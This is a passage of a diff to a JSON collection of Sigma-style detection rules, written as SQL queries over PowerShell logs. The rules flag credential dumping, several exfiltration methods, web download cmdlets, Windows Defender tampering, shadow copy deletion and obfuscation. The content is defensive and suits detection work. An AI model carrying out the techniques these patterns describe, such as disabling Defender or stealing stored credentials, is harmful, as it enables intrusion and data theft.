OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_getprocess_lsass.yml" + "filename": "posh_ps_wmimplant.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script", - "id": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", - "status": "experimental", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "author": "frack113", + "title": "Execution via CL_Mutexverifiers.ps1", + "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", + "status": "test", + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Compress-Archive %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DestinationPath %' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_zip_compress.yml" + "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" }, { - "title": "Potential Data Exfiltration Via Audio File", - "id": "e4f93c99-396f-47c8-bb0f-201b1fa69034", - "status": "experimental", - "description": "Detects potential exfiltration attempt via audio file using PowerShell", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Dump Credentials from Windows Credential Manager With PowerShell", + "id": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", + "status": "test", + "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.credential_access", + "attack.t1555" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Math]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%[IO.FileMode]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%BinaryWriter%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x52%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x49%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x46%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x57%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x41%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x56%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x45%' ESCAPE '\\' AND ScriptBlockText LIKE '%0xAC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-PasswordVaultCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CredManCreds%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Windows.Security.Credentials.PasswordVault%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.CSharp.CSharpCodeProvider%' ESCAPE '\\' AND ScriptBlockText LIKE '%[System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())%' ESCAPE '\\' AND ScriptBlockText LIKE '%Collections.ArrayList%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.CodeDom.Compiler.CompilerParameters%' ESCAPE '\\')))" ], - "filename": "posh_ps_audio_exfiltration.yml" + "filename": "posh_ps_dump_password_windows_credential_manager.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Powershell", - "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "PowerShell ICMP Exfiltration", + "id": "4c4af3cd-2115-479c-8193-6b8bfce9001c", + "status": "test", + "description": "Detects Exfiltration Over Alternative Protocol - ICMP. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.", + "author": "Bartlomiej Czyz @bczyz1, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Unknown" + "Legitimate usage of System.Net.NetworkInformation.Ping class" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Net.NetworkInformation.Ping%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Send(%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" + "filename": "posh_ps_icmp_exfiltration.yml" }, { "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", @@ -7046,185 +6954,205 @@ "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Powershell", - "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", + "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script", + "id": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Compress-Archive %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DestinationPath %' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" + "filename": "posh_ps_susp_zip_compress.yml" }, { - "title": "Suspicious FromBase64String Usage On Gzip Archive - Ps Script", - "id": "df69cb1d-b891-4cd9-90c7-d617d90100ce", + "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript", + "id": "975b2262-9a49-439d-92a6-0709cccdf0b2", "status": "experimental", - "description": "Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.", - "author": "frack113", + "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.defense_evasion" + ], "falsepositives": [ - "Legitimate administrative script" + "Installation of unsigned packages for testing purposes" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%FromBase64String%' ESCAPE '\\' AND ScriptBlockText LIKE '%MemoryStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%H4sI%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AppPackage %' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-AppxPackage %' ESCAPE '\\') AND ScriptBlockText LIKE '% -AllowUnsigned%' ESCAPE '\\')" ], - "filename": "posh_ps_frombase64string_archive.yml" + "filename": "posh_ps_install_unsigned_appx_packages.yml" }, { - "title": "Suspicious Get-ADReplAccount", - "id": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", + "title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock", + "id": "1139d2e2-84b1-4226-b445-354492eba8ba", + "status": "experimental", + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs", + "author": "James Pemberton / @4A616D6573", + "tags": [ + "attack.execution", + "attack.t1059.001" + ], + "falsepositives": [ + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\' OR ScriptBlockText LIKE '%wget %' ESCAPE '\\' OR ScriptBlockText LIKE '%curl %' ESCAPE '\\' OR ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR ScriptBlockText LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\') AND NOT (Path LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\'))" + ], + "filename": "posh_ps_web_request_cmd_and_cmdlets.yml" + }, + { + "title": "Powershell Timestomp", + "id": "c6438007-e081-42ce-9483-b067fbef33c3", "status": "test", - "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", + "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.defense_evasion", + "attack.t1070.006" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate admin script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADReplAccount%' ESCAPE '\\' AND ScriptBlockText LIKE '%-All %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Server %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.CreationTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastWriteTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastAccessTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetCreationTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastAccessTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastWriteTime%' ESCAPE '\\'))" ], - "filename": "posh_ps_get_adreplaccount.yml" + "filename": "posh_ps_timestomp.yml" }, { - "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell", - "id": "db885529-903f-4c5d-9864-28fe199e6370", + "title": "Windows Screen Capture with CopyFromScreen", + "id": "d4a11f63-2390-411c-9adf-d791fd152830", "status": "experimental", - "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.collection", + "attack.t1113" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADComputer %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter \\*' ESCAPE '\\' AND (ScriptBlockText LIKE '% | Select %' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-File%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Content%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%.CopyFromScreen%' ESCAPE '\\')" ], - "filename": "posh_ps_computer_discovery_get_adcomputer.yml" + "filename": "posh_ps_capture_screenshots.yml" }, { - "title": "Powershell Exfiltration Over SMTP", - "id": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", + "title": "Tamper Windows Defender - PSClassic", + "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", "status": "experimental", - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Send-MailMessage%' ESCAPE '\\' AND NOT (ScriptBlockText LIKE '%CmdletsToExport%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_send_mailmessage.yml" + "filename": "posh_pc_tamper_with_windows_defender.yml" }, { - "title": "Suspicious PowerShell Download - Powershell Script", - "id": "403c2cc0-7f6b-4925-9423-bfa573bed7eb", - "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell", + "id": "f65e22f9-819e-4f96-9c7b-498364ae7a25", + "status": "test", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "PowerShell scripts that download content from the Internet" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.DownloadFile(%' ESCAPE '\\' OR ScriptBlockText LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (HostApplication LIKE '%-ModuleName %' ESCAPE '\\' OR HostApplication LIKE '%-ModulePath %' ESCAPE '\\' OR HostApplication LIKE '%-ScriptBlock %' ESCAPE '\\' OR HostApplication LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_download.yml" + "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml" }, { - "title": "Create Volume Shadow Copy with Powershell", - "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "title": "Remote PowerShell Session (PS Classic)", + "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", "status": "test", - "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", - "author": "frack113", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate use remote PowerShell sessions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" ], - "filename": "posh_ps_create_volume_shadow_copy.yml" + "filename": "posh_pc_remote_powershell_session.yml" }, { - "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript", - "id": "975b2262-9a49-439d-92a6-0709cccdf0b2", - "status": "experimental", - "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell", + "id": "71ff406e-b633-4989-96ec-bc49d825a412", + "status": "test", + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.defense_evasion" + "attack.collection", + "attack.t1074.001" ], "falsepositives": [ - "Installation of unsigned packages for testing purposes" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AppPackage %' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-AppxPackage %' ESCAPE '\\') AND ScriptBlockText LIKE '% -AllowUnsigned%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND HostApplication LIKE '%Compress-Archive %' ESCAPE '\\' AND HostApplication LIKE '% -Path %' ESCAPE '\\' AND HostApplication LIKE '% -DestinationPath %' ESCAPE '\\' AND HostApplication LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_install_unsigned_appx_packages.yml" + "filename": "posh_pc_susp_zip_compress.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", - "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", + "title": "PowerShell Downgrade Attack - PowerShell", + "id": "6331d09b-4785-4c13-980f-f96661356249", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "author": "Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" + "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND EngineVersion LIKE '2.%' ESCAPE '\\' AND NOT (HostVersion LIKE '2.%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" + "filename": "posh_pc_downgrade_attack.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell", - "id": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", + "title": "Suspicious XOR Encoded PowerShell Command Line - PowerShell", + "id": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", + "author": "Teymur Kheirkhabarov, Harish Segar (rule)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -7233,4739 +7161,4682 @@ ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%rundll32.exe%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ScriptBlockText LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ConsoleHost' AND (HostApplication LIKE '%bxor%' ESCAPE '\\' OR HostApplication LIKE '%join%' ESCAPE '\\' OR HostApplication LIKE '%char%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_rundll.yml" + "filename": "posh_pc_xor_commandline.yml" }, { - "title": "Suspicious Unblock-File", - "id": "5947497f-1aa4-41dd-9693-c9848d58727d", + "title": "PowerShell Called from an Executable Version Mismatch", + "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", "status": "test", - "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", - "author": "frack113", + "description": "Detects PowerShell called from an executable by the version mismatch method", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1553.005" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Unblock-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_unblock_file.yml" + "filename": "posh_pc_exe_calling_ps.yml" }, { - "title": "Powershell Token Obfuscation - Powershell", - "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", - "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "title": "Suspicious Non PowerShell WSMAN COM Provider", + "id": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", + "status": "test", + "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1027.009" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Windows PowerShell' AND ProviderName = 'WSMan' AND NOT (HostApplication LIKE '%powershell%' ESCAPE '\\'))" ], - "filename": "posh_ps_token_obfuscation.yml" + "filename": "posh_pc_wsman_com_provider_no_powershell.yml" }, { - "title": "Suspicious Export-PfxCertificate", - "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", - "status": "test", - "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", - "author": "Florian Roth (Nextron Systems)", + "title": "Delete Volume Shadow Copies Via WMI With PowerShell", + "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities via PowerShell", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' 